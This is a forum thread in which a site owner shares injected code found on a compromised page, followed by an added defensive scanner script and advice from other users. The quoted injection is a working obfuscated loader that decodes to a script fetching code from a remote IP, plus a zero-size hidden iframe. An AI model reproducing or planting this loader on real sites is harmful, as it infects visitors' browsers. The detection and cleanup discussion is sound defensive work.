I recently got nailed by Google on some of my sites. They categorized my sites as "malware." Bizarre to say the least. I have been operating these sites for almost ten years. Anyway, I found a strange piece of code at the bottom of one of my pages:
<!-- ad --><html><script>
/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0hfpwj{ju0tubut/kt#?=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/
</script></html><!-- /ad --><!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://example.com/trf.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script><!-- counter -->
I have no idea how this happened. Has anyone had this happen to them? HOW can this get on there? I want to prevent this kind of thing from happening in the future.
[edited by: engine at 7:34 pm (utc) on April 24, 2009]
[edit reason] examplified [/edit]
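A static check for the patterns in the snippet quoted in the post above, as an added example that is not part of the original thread: it flags the IE-only conditional-compilation marker, zero-size iframes, and strings hidden behind the subtract-one loop, decoding them as data without running anything. The sample page and its hosts are constructed placeholders, and `scanPage` and `shiftDecode` are names made up for this example.

```javascript
// Undo the "charCodeAt(i) - n" loop on a string; the string is never executed.
function shiftDecode(text, n) {
  return Array.from(text, c => String.fromCharCode(c.charCodeAt(0) - n)).join('');
}

function scanPage(html) {
  const findings = [];
  // JScript conditional compilation: the block only runs in Internet Explorer.
  if (/\/\*@cc_on/i.test(html)) findings.push({ type: 'conditional-compilation' });

  // Zero-size iframes, whether written directly or inside document.write().
  for (const m of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const tag = m[0];
    if (/\bwidth\s*=\s*["']?0\b/i.test(tag) && /\bheight\s*=\s*["']?0\b/i.test(tag)) {
      const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(tag);
      findings.push({ type: 'hidden-iframe', src: src ? src[1] : null });
    }
  }

  // Character-shift decoder: read the offset, then decode each string literal.
  const loop = /fromCharCode\(\s*\w+\.charCodeAt\(\s*\w+\s*\)\s*-\s*(\d+)\s*\)/.exec(html);
  if (loop) {
    const n = Number(loop[1]);
    for (const m of html.matchAll(/"([^"\n]{8,})"/g)) {
      const decoded = shiftDecode(m[1], n);
      const src = /<(?:script|iframe)\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(decoded);
      if (src) findings.push({ type: 'shift-encoded-loader', shift: n, src: src[1] });
    }
  }
  return findings;
}

// Constructed sample page with placeholder hosts, in the same shape as the post.
// A shift of -1 encodes, so the scanner has to reverse it with the loop's offset.
const encoded = shiftDecode('<script src="http://stats.example.invalid/s.js"></script>', -1);
const samplePage = [
  '<p>legitimate content</p>',
  '<script>/*@cc_on @*/ /*@if (@_win32)',
  'var source ="' + encoded + '"; var result = "";',
  'for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);',
  'document.write(result); /*@end @*/</script>',
  '<script>document.write(\'<iframe src="http://example.com/trf.php" width=0 height=0></iframe>\');</script>',
].join('\n');

console.log(scanPage(samplePage));
```

Run over every file in the web root, a check like this shows which pages carry the injected block, which matters when more than one page was modified.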
That sort of attack is getting much more common; WordPress and other similar products have been targeted several times.
There's a lot of advice in previous threads. You need to go beyond cleaning out the code and changing the passwords. There is some fundamental loophole that the miscreants are taking advantage of.